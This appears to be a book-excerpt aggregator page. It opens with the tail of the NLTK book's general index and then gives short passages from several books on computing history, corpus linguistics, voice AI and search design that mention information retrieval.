simplified tagset, 183 storing POS tags in tagged corpora, 181 tagged data from four Indian languages, 182 unsimplifed tags, 187 use in noun phrase chunking, 265 using consecutive classifier, 231 pre-sorting, 160 precision, evaluating search tasks for, 239 precision/recall trade-off in information retrieval, 205 predicates (first-order logic), 372 prepositional phrase (PP), 297 prepositional phrase attachment ambiguity, 300 Prepositional Phrase Attachment Corpus, 316 prepositions, 186 present participles, 211 Principle of Compositionality, 385, 443 print statements, 89 newline at end, 90 string formats and, 117 prior probability, 246 probabilistic context-free grammar (PCFG), 320 probabilistic model, naive Bayes classifier, 248 probabilistic parsing, 318 procedural style, 139 processing pipeline (NLP), 86 productions in grammars, 293 rules for writing CFGs for parsing in NLTK, 301 program development, 154–160 debugging techniques, 158 defensive programming, 159 multimodule programs, 156 Python module structure, 154 sources of error, 156 programming style, 139 programs, writing, 129–177 advanced features of functions, 149–154 algorithm design, 160–167 assignment, 130 conditionals, 133 equality, 132 functions, 142–149 resources for further reading, 173 sequences, 133–138 style considerations, 138–142 legitimate uses for counters, 141 procedural versus declarative style, 139 General Index | 473 Python coding style, 138 summary of important points, 172 using Python libraries, 167–172 Project Gutenberg, 80 projections, 347 projective, 311 pronouncing dictionary, 63–65 pronouns anaphoric antecedents, 397 interpreting in first-order logic, 373 resolving in discourse processing, 401 proof goal, 376 properties of linguistic categories, 331 propositional logic, 368–371 Boolean operators, 368 propositional symbols, 368 pruning decision nodes, 245 punctuation, classifier for, 233 Python carriage return and linefeed characters, 80 codecs module, 95 dictionary data structure, 65 dictionary methods, summary of, 197 documentation, 173 documentation and information resources, 34 ElementTree module, 427 errors in understanding semantics of, 157 finding type of any object, 86 getting started, 2 increasing efficiency of numerically intense algorithms, 257 libraries, 167–172 CSV, 170 Matplotlib, 168–170 NetworkX, 170 NumPy, 171 other, 172 reference materials, 122 style guide for Python code, 138 textwrap module, 120 Python Package Index, 172 Q quality control in corpus creation, 413 quantification first-order logic, 373, 380 quantified noun phrases, 390 scope ambiguity, 381, 394–397 474 | General Index quantified formulas, interpretation of, 380 questions, answering, 29 quotation marks in strings, 87 R random text generating in various styles, 6 generating using bigrams, 55 raster (pixel) images, 169 raw strings, 101 raw text, processing, 79–128 capturing user input, 85 detecting word patterns with regular expressions, 97–101 formatting from lists to strings, 116–121 HTML documents, 82 NLP pipeline, 86 normalizing text, 107–108 reading local files, 84 regular expressions for tokenizing text, 109– 112 resources for further reading, 122 RSS feeds, 83 search engine results, 82 segmentation, 112–116 strings, lowest level text processing, 87–93 summary of important points, 121 text from web and from disk, 80 text in binary formats, 85 useful applications of regular expressions, 102–106 using Unicode, 93–97 raw( ) function, 41 re module, 101, 110 recall, evaluating search tasks for, 240 Recognizing Textual Entailment (RTE), 32, 235 exploiting word context, 230 records, 136 recursion, 161 function to compute Sanskrit meter (example), 165 in linguistic structure, 278–281 tree traversal, 280 trees, 279–280 performance and, 163 in syntactic structure, 301 recursive, 301 recursive descent parsing, 303 reentrancy, 340 references (see object references) regression testing framework, 160 regular expressions, 97–106 character class and other symbols, 110 chunker based on, evaluating, 272 extracting word pieces, 102 finding word stems, 104 matching initial and final vowel sequences and all consonants, 102 metacharacters, 101 metacharacters, summary of, 101 noun phrase (NP) chunker based on, 265 ranges and closures, 99 resources for further information, 122 searching tokenized text, 105 symbols, 110 tagger, 199 tokenizing text, 109–112 use in PlaintextCorpusReader, 51 using basic metacharacters, 98 using for relation extraction, 284 using with conditional frequency distributions, 103 relation detection, 263 relation extraction, 284 relational operators, 22 reserved words, 15 return statements, 144 return value, 57 reusing code, 56–59 creating programs using a text editor, 56 functions, 57 modules, 59 Reuters Corpus, 44 root element (XML), 427 root hypernyms, 70 root node, 242 root synsets, 69 Rotokas language, 66 extracting all consonant-vowel sequences from words, 103 Toolbox file containing lexicon, 429 RSS feeds, 83 feedparser library, 172 RTE (Recognizing Textual Entailment), 32, 235 exploiting word context, 230 runtime errors, 13 S \s whitespace characters in regular expressions, 111 \S nonwhitespace characters in regular expressions, 111 SAMPA computer-readable phonetic alphabet, 137 Sanskrit meter, computing, 165 satisfies, 379 scope of quantifiers, 381 scope of variables, 145 searches binary search, 160 evaluating for precision and recall, 239 processing search engine results, 82 using POS tags, 187 segmentation, 112–116 in chunking and tokenization, 264 sentence, 112 word, 113–116 semantic cues to word category, 211 semantic interpretations, NLTK functions for, 393 semantic role labeling, 29 semantics natural language, logic and, 365–368 natural language, resources for information, 403 semantics of English sentences, 385–397 quantifier ambiguity, 394–397 transitive verbs, 391–394 ⋏-calculus, 386–390 SemCor tagging, 214 sentence boundaries, tagging across, 208 sentence segmentation, 112, 233 in chunking, 264 in information retrieval process, 263 sentence structure, analyzing, 291–326 context-free grammar, 298–302 dependencies and dependency grammar, 310–315 grammar development, 315–321 grammatical dilemmas, 292 parsing with context-free grammar, 302– 310 resources for further reading, 322 summary of important points, 321 syntax, 295–298 sents( ) function, 41 General Index | 475 sequence classification, 231–233 other methods, 233 POS tagging with consecutive classifier, 232 sequence iteration, 134 sequences, 133–138 combining different sequence types, 136 converting between sequence types, 135 operations on sequence types, 134 processing using generator expressions, 137 strings and lists as, 92 shift operation, 305 shift-reduce parsing, 304 Shoebox, 66, 412 sibling nodes, 279 signature, 373 similarity, semantic, 71 Sinica Treebank Corpus, 316 slash categories, 350 slicing lists, 12, 13 strings, 15, 90 smoothing, 249 space-time trade-offs in algorihm design, 163 spaces, matching in regular expressions, 109 Speech Synthesis Markup Language (W3C SSML), 214 spellcheckers, Words Corpus used by, 60 spoken dialogue systems, 31 spreadsheets, obtaining data from, 418 SQL (Structured Query Language), 362 translating English sentence to, 362 stack trace, 158 standards for linguistic data creation, 421 standoff annotation, 415, 421 start symbol for grammars, 298, 334 startswith( ) function, 45 stemming, 107 NLTK HOWTO, 122 stemmers, 107 using regular expressions, 104 using stem( ) fuinction, 105 stopwords, 60 stress (in pronunciation), 64 string formatting expressions, 117 string literals, Unicode string literal in Python, 95 strings, 15, 87–93 476 | General Index accessing individual characters, 89 accessing substrings, 90 basic operations with, 87–89 converting lists to, 116 formats, 117–118 formatting lining things up, 118 tabulating data, 119 immutability of, 93 lists versus, 92 methods, 92 more operations on, useful string methods, 92 printing, 89 Python’s str data type, 86 regular expressions as, 101 tokenizing, 86 structurally ambiguous sentences, 300 structure sharing, 340 interaction with unification, 343 structured data, 261 style guide for Python code, 138 stylistics, 43 subcategories of verbs, 314 subcategorization, 344–347 substrings (WFST), 307 substrings, accessing, 90 subsumes, 341 subsumption, 341–344 suffixes, classifier for, 229 supervised classification, 222–237 choosing features, 224–227 documents, 227 exploiting context, 230 gender identification, 222 identifying dialogue act types, 235 part-of-speech tagging, 229 Recognizing Textual Entailment (RTE), 235 scaling up to large datasets, 237 sentence segmentation, 233 sequence classification, 231–233 Swadesh wordlists, 65 symbol processing, language processing versus, 442 synonyms, 67 synsets, 67 semantic similarity, 71 in WordNet concept hierarchy, 69 syntactic agreement, 329–331 syntactic cues to word category, 211 syntactic structure, recursion in, 301 syntax, 295–298 syntax errors, 3 T \t tab character in regular expressions, 111 T9 system, entering text on mobile phones, 99 tabs avoiding in code indentation, 138 matching in regular expressions, 109 tag patterns, 266 matching, precedence in, 267 tagging, 179–219 adjectives and adverbs, 186 combining taggers, 205 default tagger, 198 evaluating tagger performance, 201 exploring tagged corpora, 187–189 lookup tagger, 200–201 mapping words to tags using Python dictionaries, 189–198 nouns, 184 part-of-speech (POS) tagging, 229 performance limitations, 206 reading tagged corpora, 181 regular expression tagger, 199 representing tagged tokens, 181 resources for further reading, 214 across sentence boundaries, 208 separating training and testing data, 203 simplified part-of-speech tagset, 183 storing taggers, 206 transformation-based, 208–210 unigram tagging, 202 unknown words, 206 unsimplified POS tags, 187 using POS (part-of-speech) tagger, 179 verbs, 185 tags in feature structures, 340 IOB tags representing chunk structures, 269 XML, 425 tagsets, 179 morphosyntactic information in POS tagsets, 212 simplified POS tagset, 183 terms (first-order logic), 372 test sets, 44, 223 choosing for classification models, 238 testing classifier for document classification, 228 text, 1 computing statistics from, 16–22 counting vocabulary, 7–10 entering on mobile phones (T9 system), 99 as lists of words, 10–16 searching, 4–7 examining common contexts, 5 text alignment, 30 text editor, creating programs with, 56 textonyms, 99 textual entailment, 32 textwrap module, 120 theorem proving in first order logic, 375 timeit module, 164 TIMIT Corpus, 407–412 tokenization, 80 chunking and, 264 in information retrieval, 263 issues with, 111 list produced from tokenizing string, 86 regular expressions for, 109–112 representing tagged tokens, 181 segmentation and, 112 with Unicode strings as input and output, 97 tokenized text, searching, 105 tokens, 8 Toolbox, 66, 412, 431–435 accessing data from XML, using ElementTree, 429 adding field to each entry, 431 resources for further reading, 438 validating lexicon, 432–435 tools for creation, publication, and use of linguistic data, 421 top-down approach to dynamic programming, 167 top-down parsing, 304 total likelihood, 251 training classifier, 223 classifier for document classification, 228 classifier-based chunkers, 274–278 taggers, 203 General Index | 477 unigram chunker using CoNLL 2000 Chunking Corpus, 273 training sets, 223, 225 transformation-based tagging, 208–210 transitive verbs, 314, 391–394 translations comparative wordlists, 66 machine (see machine translation) treebanks, 315–317 trees, 279–281 representing chunks, 270 traversal of, 280 trie, 162 trigram taggers, 204 truth conditions, 368 truth-conditional semantics in first-order logic, 377 tuples, 133 lists versus, 136 parentheses with, 134 representing tagged tokens, 181 Turing Test, 31, 368 type-raising, 390 type-token distinction, 8 TypeError, 157 types, 8, 86 (see also data types) types (first-order logic), 373 U unary predicate, 372 unbounded dependency constructions, 349– 353 defined, 350 underspecified, 333 Unicode, 93–97 decoding and encoding, 94 definition and description of, 94 extracting gfrom files, 94 resources for further information, 122 using your local encoding in Python, 97 unicodedata module, 96 unification, 342–344 unigram taggers confusion matrix for, 240 noun phrase chunking with, 272 unigram tagging, 202 lookup tagger (example), 200 separating training and test data, 203 478 | General Index unique beginners, 69 Universal Feed Parser, 83 universal quantifier, 374 unknown words, tagging, 206 updating dictionary incrementally, 195 US Presidential Inaugural Addresses Corpus, 45 user input, capturing, 85 V valencies, 313 validity of arguments, 369 validity of XML documents, 426 valuation, 377 examining quantifier scope ambiguity, 381 Mace4 model converted to, 384 valuation function, 377 values, 191 complex, 196 variables arguments of predicates in first-order logic, 373 assignment, 378 bound by quantifiers in first-order logic, 373 defining, 14 local, 58 naming, 15 relabeling bound variables, 389 satisfaction of, using to interpret quantified formulas, 380 scope of, 145 verb phrase (VP), 297 verbs agreement paradigm for English regular verbs, 329 auxiliary, 336 auxiliary verbs and inversion of subject and verb, 348 categorizing and tagging, 185 examining for dependency grammar, 312 head of sentence and dependencies, 310 present participle, 211 transitive, 391–394 W \W non-word characters in Python, 110, 111 \w word characters in Python, 110, 111 web text, 42 Web, obtaining data from, 416 websites, obtaining corpora from, 416 weighted grammars, 318–321 probabilistic context-free grammar (PCFG), 320 well-formed (XML), 425 well-formed formulas, 368 well-formed substring tables (WFST), 307– 310 whitespace regular expression characters for, 109 tokenizing text on, 109 wildcard symbol (.), 98 windowdiff scorer, 414 word classes, 179 word comparison operators, 23 word occurrence, counting in text, 8 word offset, 45 word processor files, obtaining data from, 417 word segmentation, 113–116 word sense disambiguation, 28 word sequences, 7 wordlist corpora, 60–63 WordNet, 67–73 concept hierarchy, 69 lemmatizer, 108 more lexical relations, 70 semantic similarity, 71 visualization of hypernym hierarchy using Matplotlib and NetworkX, 170 Words Corpus, 60 words( ) function, 40 wrapping text, 120 Z zero counts (naive Bayes classifier), 249 zero projection, 347 X XML, 425–431 ElementTree interface, 427–429 formatting entries, 430 representation of lexical entry from chunk parsing Toolbox record, 434 resources for further reading, 438 role of, in using to represent linguistic structures, 426 using ElementTree to access Toolbox data, 429 using for linguistic structures, 425 validity of documents, 426 General Index | 479 About the Authors Steven Bird is Associate Professor in the Department of Computer Science and Software Engineering at the University of Melbourne, and Senior Research Associate in the Linguistic Data Consortium at the University of Pennsylvania.

Other useful books in this area include (Biber, Conrad, & Reppen, 1998), (McEnery, 2006), (Meyer, 2002), (Sampson & McCarthy, 2005), and (Scott & Tribble, 2006). Further readings in quantitative data analysis in linguistics are: (Baayen, 2008), (Gries, 2009), and (Woods, Fletcher, & Hughes, 1986). The original description of WordNet is (Fellbaum, 1998). Although WordNet was originally developed for research in psycholinguistics, it is now widely used in NLP and Information Retrieval. WordNets are being developed for many other languages, as documented at http://www.globalwordnet.org/. For a study of WordNet similarity measures, see (Budanitsky & Hirst, 2006). Other topics touched on in this chapter were phonetics and lexical semantics, and we refer readers to Chapters 7 and 20 of (Jurafsky & Martin, 2008). 2.8 Exercises 1. ○ Create a variable phrase containing a list of words.


Bootstrapping: Douglas Engelbart, Coevolution, and the Origins of Personal Computing (Writing Science) by Thierry Bardini

Apple II, augmented reality, Bill Duvall, conceptual framework, Donald Davies, Douglas Engelbart, Douglas Engelbart, Dynabook, experimental subject, Grace Hopper, hiring and firing, hypertext link, index card, information retrieval, invention of hypertext, Jaron Lanier, Jeff Rulifson, John von Neumann, knowledge worker, Leonard Kleinrock, Menlo Park, Mother of all demos, new economy, Norbert Wiener, Norman Mailer, packet switching, QWERTY keyboard, Ralph Waldo Emerson, RAND corporation, RFC: Request For Comment, Sapir-Whorf hypothesis, Silicon Valley, Steve Crocker, Steve Jobs, Steve Wozniak, Steven Levy, Stewart Brand, stochastic process, Ted Nelson, the medium is the message, theory of mind, Turing test, unbiased observer, Vannevar Bush, Whole Earth Catalog

The regnant term at the time for what Bush was proposing was indeed "in- formation retrieval," and Engelbart himself has testified to the power that a preconceived notion of information retrieval held for creating misunderstand- ing of his work on hypertext networks: I started trying to reach out to make connections in domains of interest and con- cerns out there that fit along the vector I was interested in. I went to the informa- tion retrieval people. I remember one instance when I went to the Ford Founda- tion's Center for Advanced Study in Social Sciences to see somebody who was there for a year, who was into informatIon retrieval. We sat around. In fact, at coffee break, there were about five people sitting there. I was trying to explain what I wanted to do and one guy just kept telling me, "You are just givIng fancy names to information retrieval. Why do that? Why don't you just admit that it's information retrieval and get on with the rest of it and make it all work?"

Why don't you just admit that it's information retrieval and get on with the rest of it and make it all work?" He was getting kind of nasty. The other guy was trying to get him to back off. (Engelbart I996) It seems difficult to dispute, therefore, that the Memex was not conceived as a medium, only as a personal "tool" for information retrieval. Personal ac- cess to information was emphasized over communication. The later research of Ted Nelson on hypertext is very representative of that emphasis. 4 It is problematic, however, to grant Bush the status of the "unique forefa- ther" of computerized hypertext systems. The situation is more complicated than that. 5 For the development of hypertext, the important distinction is not between personal access to information and communication, but between dif- ferent conceptions of what communication could mean, and there were in fact two different approaches to communication at the origin of current hypertext and hypermedia systems.

The second is represented by Douglas Engelbart and his NLS, as his oN-Line System was called, which was conceived as a way to support group collabo- 40 Language and the Body ration. The difference in objectives signals the difference in means that char- acterized the two approaches. The first revolved around the "association" of ideas on the model of how the individual mind is supposed to work. The sec- ond revolved around the intersubjective "connection" of words in the systems of natural languages. What actually differentiates hypertext systems from information -retrieval systems is not the process of "association," the term Bush proposed as analo- gous to the way the individual mind works. Instead, what constitutes a hyper- text system is clear in the definition of hypertext already cited: "a style of building systems for information representation and management around a network of nodes connected together by typed l,nks." A hypertext system is constituted by the presence of "links."


pages: 502 words: 107,510

Natural Language Annotation for Machine Learning by James Pustejovsky, Amber Stubbs

Amazon Mechanical Turk, bioinformatics, cloud computing, computer vision, crowdsourcing, easy for humans, difficult for computers, finite state, game design, information retrieval, iterative process, natural language processing, pattern recognition, performance metric, sentiment analysis, social web, speech recognition, statistical model, text mining

Timeline of Corpus Linguistics Here's a quick overview of some of the milestones in the field, leading up to where we are now. 1950s: Descriptive linguists compile collections of spoken and written utterances of various languages from field research. Literary researchers begin compiling systematic collections of the complete works of different authors. Key Word in Context (KWIC) is invented as a means of indexing documents and creating concordances. 1960s: Kucera and Francis publish A Standard Corpus of Present-Day American English (the Brown Corpus), the first broadly available large corpus of language texts. Work in Information Retrieval (IR) develops techniques for statistical similarity of document content. 1970s: Stochastic models developed from speech corpora make Speech Recognition systems possible. The vector space model is developed for document indexing. The London-Lund Corpus (LLC) is developed through the work of the Survey of English Usage. 1980s: The Lancaster-Oslo-Bergen (LOB) Corpus, designed to match the Brown Corpus in terms of size and genres, is compiled.

They are also used in speech disambiguation—if a person speaks unclearly but utters a sequence that does not commonly (or ever) occur in the language being spoken, an n-gram model can help recognize that problem and find the words that the speaker probably intended to say. Another modern corpus is ClueWeb09 (http://lemurproject.org/clueweb09.php/), a dataset “created to support research on information retrieval and related human language technologies. It consists of about 1 billion web pages in ten languages that were collected in January and February 2009.” This corpus is too large to use for an annotation project (it’s about 25 terabytes uncompressed), but some projects have taken parts of the dataset (such as a subset of the English websites) and used them for research (Pomikálek et al. 2012).

So the first word in the ranking occurs about twice as often as the second word in the ranking, and three times as often as the third word in the ranking, and so on. N-grams In this section we introduce the notion of an n-gram. N-grams are important for a wide range of applications in Natural Language Processing (NLP), because fairly straightforward language models can be built using them, for speech, Machine Translation, indexing, Information Retrieval (IR), and, as we will see, classification. Imagine that we have a string of tokens, W, consisting of the elements w1, w2, … , wn. Now consider a sliding window over W. If the sliding window consists of one cell (wi), then the collection of one-cell substrings is called the unigram profile of the string; there will be as many unigram profiles as there are elements in the string. Consider now all two-cell substrings, where we look at w1 w2, w2 w3, and so forth, to the end of the string, wn–1 wn.


pages: 392 words: 108,745

Talk to Me: How Voice Computing Will Transform the Way We Live, Work, and Think by James Vlahos

Albert Einstein, AltaVista, Amazon Mechanical Turk, Amazon Web Services, augmented reality, Automated Insights, autonomous vehicles, Chuck Templeton: OpenTable:, cloud computing, computer age, Donald Trump, Elon Musk, information retrieval, Internet of things, Jacques de Vaucanson, Jeff Bezos, lateral thinking, Loebner Prize, Machine translation of "The spirit is willing, but the flesh is weak." to Russian and back, Mark Zuckerberg, Menlo Park, natural language processing, PageRank, pattern recognition, Ponzi scheme, randomized controlled trial, Ray Kurzweil, Ronald Reagan, Rubik’s Cube, self-driving car, sentiment analysis, Silicon Valley, Skype, Snapchat, speech recognition, statistical model, Steve Jobs, Steve Wozniak, Steven Levy, Turing test, Watson beat the top human players on Jeopardy!

But this technique is laborious and limited to the narrow pool of conversational situations designers imagine in advance. A more scalable technique is information retrieval, or IR, in which the AI grabs a suitable response from a database or web page. Because there’s so much content online, IR gives machines vastly more to say than if they were limited to hand-authored utterances. The technique can also be combined with the scripted approach, filling blanks within prewritten templates. For instance, responding to a question about the weather, a voice assistant might say, “It’ll be sunny with a high of 78. Looks like a great day to go outside!” In that case, the specifics (“sunny,” “78”) were retrieved from a weather service while the surrounding words (“great day to go outside”) were manually authored as reusable boilerplate. Voice AI creators use information retrieval more than any other technique, and IR will pop up again later in this book.

., 68 Hollingshead, John, 68 Holocaust survivors, 272–74 holograms, 273 Holtzman, Ari, 163–64 HomePod, 218, 225, 280 homonyms, 112 homophones, 97 Horsley, Scott, 214–15 Houdin, Jean-Eugène Robert, 19 Houston, Farah, 133, 134 Huffman, Scott, 49 human brain, 86–87 Hunt, Troy, 230 I IBM, 3, 71, 97, 108, 205 ICT (Institute for Creative Technologies), 244–46, 272–74 ImageNet Large-Scale Visual Recognition Challenge, 93–94 image recognition, 87–88, 90, 91–94, 103 immortality, virtual. See virtual immortality information retrieval (IR), 103–4, 146, 149–50, 160 InspiroBot, 108 Institute for Creative Technologies (ICT), 244–46, 272–74 intents, 257, 262 interactive voice response (IVR), 127 Internet of Things, 21–22 internet search technology, 3, 26, 54, 199–200, 203, 212, 278. See also question answering Invoke, 281 iPhone Evi app on, 203–4 sales of, 45 Siri and, 8, 17–18, 37, 47, 50, 212, 225 speech recognition and, 95 unveiling of, 7, 25 voice search app, 48 IR (information retrieval), 103–4, 146, 149–50, 160 Iris, 29 Irson, Thomas, 65 Isbitski, David, xvi Ishiguro, Hiroshi, 190–91 Ivona, 41–42 IVR (interactive voice response), 127 J Jack in the Box, 46 Jackson, Samuel L., 46 Jacob, Oren, 134, 171–73, 196, 253 Jarvis, 51 Jobs, Steve, 7, 34–37, 47, 48, 172 journalism, AI, 214–16 Julia (chatbot), 80–84, 98 Julia, Luc, 47 K Kahn, Peter, 192, 244 Karim (therapist chatbot), 246 Kasisto, 132 Kay, Tim, ix–x, xii–xiii, 13 Kelly, John, 110 Kempelen, Wolfgang von, 65–67, 69 Kim Jong Un, 217 Kindle, 41 Kismet (robot), 191–92 Kittlaus, Dag, 23–29, 32–37, 46–47, 55, 279 Kleber, Sophie, 278 Klein, Stephen, xiii knowledge, control of, 220 knowledge-based AI, 76–78, 84, 159, 161–63 Knowledge Graph, 204, 206, 212 knowledge graphs, 201–2, 204–5, 213 Knowledge Navigator, 16–18, 27 Krizhevsky, Alex, 93, 94 Kunze, Lauren, 256 Kurzweil, Fredric, 274–76 Kurzweil, Ray, 274–76, 277 Kuyda, Eugenia, 186–88, 196 Kuznetsov, Phillip, 261 Kylie.ai, 107 L L2, 209 language and human species, 4, 285–86 language models for ASR, 96–97 Lasseter, John, 172 Lawson, Lindsey, 169, 182 Le, Quoc, 93, 97, 105–6, 254 LeCun, Yann, 89, 91–92, 93–94, 161 Lemon, Oliver, 145–46, 148, 158, 159 Lenat, Doug, 161, 162 Levitan, Peter, ix, xi, xii–xiii Levy, Steven, 79 Lewis, Thor, 138 Lieberman, Philip, 14 LifePod, 239 Lindbeck, Erica, 179–80 Lindsay, Al, 41, 44 linguistics, 127 linguistics, computational, 72 lip reading, 98 Loebner Prize competition, 82–84, 142, 160, 285 long short-term memory (LSTM), 106 Loup Ventures, 213 Love, Rachel, 271 LSTM (long short-term memory), 106 Luka, 186–87 Lycos, 79 Lyrebird, 114–15, 217 M M (virtual assistant), 51–52 machine learning.

One of the core principles for Germick and his colleagues is that the Assistant speaks like a human but doesn’t pretend to be one. “It’d be oddly disingenuous,” Germick says, “if we took you down the path of ‘My name is Marty. I’m a twenty-seven-year-old windsurfing enthusiast from Santa Barbara, California.’ We wanted to stop shy of that.” But Google wanted to flesh out the Assistant character at least somewhat. “We weren’t just thinking of voice as an information-retrieval system,” Germick says, “but also as a character that you want to spend time with and recognize the humanity of, in a sense.” So Google decided that the Assistant should be like a “hipster librarian,” knowledgeable, helpful, and quirky. It would be nonconfrontational and subservient to the user, a facilitator rather than a leader. “If we are the Beatles, we are probably Ringo,” Germick says.


pages: 205 words: 20,452

Data Mining in Time Series Databases by Mark Last, Abraham Kandel, Horst Bunke

call centre, computer vision, discrete time, G4S, information retrieval, iterative process, NP-complete, p-value, pattern recognition, random walk, sensor fusion, speech recognition, web application

., Sawhney, H.S., and Shim, K. (1995). Fast Similarity Search in the Presence of Noise, Scaling, and Translation in Time-Series Database. Proc. 21st Int. Conf. on Very Large Databases (VLDB), pp. 490– 501. 3. Baeza-Yates, R. and Gonnet, G.H. (1999). A Fast Algorithm on Average for All-Against-All Sequence Matching. Proc. 6th String Processing and Information Retrieval Symposium (SPIRE), pp. 16–23. 4. Baeza-Yates, R. and Ribeiro-Neto, B. (1999). Modern Information Retrieval. ACM Press/Addison–Wesley Longman Limited. 5. Chakrabarti, K. and Mehrotra, S. (1999). The Hybrid Tree: An Index Structure for High Dimensional Feature Spaces. Proc. 15th Int. Conf. on Data Engineering (ICDE), pp. 440–447. 6. Chan, K. and Fu, A.W. (1999). Efficient Time Series Matching by Wavelets. Proc. 15th Int. Conf. on Data Engineering (ICDE), pp. 126–133. 7.

An Enhanced Representation of Time Series which Allows Fast and Accurate Classification, Clustering and Relevance Feedback. Proceedings of the 4th International Conference of Knowledge Discovery and Data Mining, AAAI Press, pp. 239–241. 14. Keogh, E. and Pazzani, M. (1999). Relevance Feedback Retrieval of Time Series Data. Proceedings of the 22th Annual International ACM-SIGIR Conference on Research and Development in Information Retrieval, pp. 183–190. 15. Keogh, E. and Smyth, P. (1997). A Probabilistic Approach to Fast Pattern Matching in Time Series Databases. Proceedings of the 3rd International Conference of Knowledge Discovery and Data Mining, pp. 24–20. 16. Last, M., Klein, Y., and Kandel, A. (2001). Knowledge Discovery in Time Series Databases. IEEE Transactions on Systems, Man, and Cybernetics, 31B(1), 160–169. 17.

In many of these applications, searching through large, unstructured databases based on sample sequences is often desirable. Such similarity-based retrieval has attracted a great deal of attention in recent years. Although several different approaches have appeared, most are based on the common premise of dimensionality reduction and spatial access methods. This chapter gives an overview of recent research and shows how the methods fit into a general context of signature extraction. Keywords: Information retrieval; sequence databases; similarity search; spatial indexing; time sequences. 1. Introduction Time sequences arise in many applications—any applications that involve storing sensor inputs, or sampling a value that changes over time. A problem which has received an increasing amount of attention lately is the problem of similarity retrieval in databases of time sequences, so-called “query by example.”


Designing Search: UX Strategies for Ecommerce Success by Greg Nudelman, Pabini Gabriel-Petit

access to a mobile phone, Albert Einstein, AltaVista, augmented reality, barriers to entry, business intelligence, call centre, crowdsourcing, information retrieval, Internet of things, performance metric, QR code, recommendation engine, RFID, search engine result page, semantic web, Silicon Valley, social graph, social web, speech recognition, text mining, the map is not the territory, The Wisdom of Crowds, web application, zero-sum game, Zipcar

“Reification and Affordances in a User Interface for Interacting with Heterogeneous Distributed Applications.” PhD thesis, Stanford University, May 1997. [Ellis, 1989] D. Ellis. A behavioural model for information retrieval system design. Journal of Information Science, 15: pp. 237–247, 1989. [Bates, 1979] M.J. Bates. Information search tactics. Journal of the American Society for Information Science, 30(4): pp. 205–214, 1979. [Norman, 1988] D.A. Norman. The Psychology of Everyday Things. Basic Books, New York, 1988. [Pirolli and Card, 1999] P. Pirolli and S.K. Card. Information foraging. Psychological Review, 106(4):pp. 643–675, 1999. [Belkin et al., 1993] N. Belkin, P. G. Marchetti, and C. Cool. Braque – design of an interface to support user interaction in information retrieval. Information Processing and Management, 29(3): pp. 325–344, 1993. [Chang and Rice, 1993] Shan-Ju Chang and Ronald E.

More recently, he has written and presented on “The Rhythm of Interaction,” urging colleagues to design pacing and tempo into what are increasingly dynamic and cinematic user experiences. He holds a degree in music theory and composition from Harvard. Daniel Tunkelang is a leading industry advocate of human-computer information retrieval (HCIR). He was a founding employee of faceted search pioneer Endeca, where he spent ten years as Chief Scientist. During that time, he established the HCIR workshop, which has taken place annually since 2007. Always working to bring together industry and academia, he co-organized the 2010 Workshop on Search and Social Media and has served as an organizer for the industry tracks of the premier conferences on information retrieval: SIGIR and CIKM. He authored a popular book on faceted search as part of the Morgan & Claypool Synthesis Lectures. In November 2009, he moved to Google, where he works on local search quality.

The strength of using a tabs-based sorting mechanism as the App Store’s primary navigation is the ability to offer inventory in a format that is optimized for a specific entry point, thus forming a series of parallel views of their inventory. These tabs-based sorting controls are extremely usable and intuitive, and readily contribute to a customer’s success. Figure 10-3: The iPhone App Store’s sort-by controls facilitate browsing Myth #4: Sorting and Filtering Cannot Be Combined in One Control As the amount of information retrieved increases, sorting search results becomes less and less about reordering the results and more about providing a convenient way to massage the results into a manageable form that more closely matches the person’s goals. This is especially important for user interfaces with limited screen real estate—like those on the mobile platforms. However, even on the Web, the demarcation between filtering and sorting is not necessarily a rigid one.


pages: 252 words: 74,167

Thinking Machines: The Inside Story of Artificial Intelligence and Our Race to Build the Future by Luke Dormehl

Ada Lovelace, agricultural Revolution, AI winter, Albert Einstein, Alexey Pajitnov wrote Tetris, algorithmic trading, Amazon Mechanical Turk, Apple II, artificial general intelligence, Automated Insights, autonomous vehicles, book scanning, borderless world, call centre, cellular automata, Claude Shannon: information theory, cloud computing, computer vision, correlation does not imply causation, crowdsourcing, drone strike, Elon Musk, Flash crash, friendly AI, game design, global village, Google X / Alphabet X, hive mind, industrial robot, information retrieval, Internet of things, iterative process, Jaron Lanier, John Markoff, John Maynard Keynes: Economic Possibilities for our Grandchildren, John Maynard Keynes: technological unemployment, John von Neumann, Kickstarter, Kodak vs Instagram, Law of Accelerating Returns, life extension, Loebner Prize, Marc Andreessen, Mark Zuckerberg, Menlo Park, natural language processing, Norbert Wiener, out of africa, PageRank, pattern recognition, Ray Kurzweil, recommendation engine, remote working, RFID, self-driving car, Silicon Valley, Skype, smart cities, Smart Cities: Big Data, Civic Hackers, and the Quest for a New Utopia, social intelligence, speech recognition, Stephen Hawking, Steve Jobs, Steve Wozniak, Steven Pinker, strong AI, superintelligent machines, technological singularity, The Coming Technological Singularity, The Future of Employment, Tim Cook: Apple, too big to fail, Turing machine, Turing test, Vernor Vinge, Watson beat the top human players on Jeopardy!

Reachable only via a specially installed hydraulic lift, the egg welcomed in excited Fair attendees so that they could sit in a high-tech screening room and watch a video on the future of Artificial Intelligence. ‘See it, THINK, and marvel at the mind of man and his machine,’ wrote one giddy reviewer, borrowing the ‘Think’ tagline that had been IBM’s since the 1920s. IBM showed off several impressive technologies at the event. One was a groundbreaking handwriting recognition computer, which the official fair brochure referred to as an ‘Optical Scanning and Information Retrieval’ system. This demo allowed visitors to write an historical date of their choosing (post-1851) in their own handwriting on a small card. That card was then fed into an ‘optical character reader’ where it was converted into digital form, and then relayed once more to a state-of-the-art IBM 1460 computer system. Major news events were stored on disk in a vast database and the results were then printed onto a commemorative punch-card for the amazement of the user.

Perhaps borrowing a bit of Kennedy-style gauntlet-throwing, he casually added his own timeline: ‘It would be surprising if it were not accomplished within the next decade.’ Simon’s prediction was hopelessly off, but as it turns out, the second thing that registers about the World’s Fair is that IBM wasn’t wrong. All three of the technologies that dropped jaws in 1964 are commonplace today – despite our continued insistence that AI is not yet here. The Optical Scanning and Information Retrieval has become the Internet: granting us access to more information at a moment’s notice than we could possibly hope to absorb in a lifetime. While we still cannot see the future, we are making enormous advances in this capacity, thanks to the huge datasets generated by users that offer constant forecasts about the news stories, books or songs that are likely to be of interest to us. This predictive connectivity isn’t limited to what would traditionally be thought of as a computer, either, but is embedded in the devices, vehicles and buildings around us thanks to a plethora of smart sensors and devices.

